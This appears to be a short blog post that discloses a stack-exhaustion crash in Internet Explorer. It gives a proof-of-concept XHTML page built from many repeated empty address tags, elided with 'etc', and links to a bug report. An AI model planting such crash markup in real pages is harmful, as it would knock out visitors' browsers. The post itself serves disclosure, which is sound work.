Many nested tags in MSIE can cause stack exhaustion, which can crash the tab and even the entire browser.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<address/><address/><address/><address/><address/><address/>.... etc...
</html>
More details here: http://code.google.com/p/skylined/issues/detail?id=14.


Leave a Comment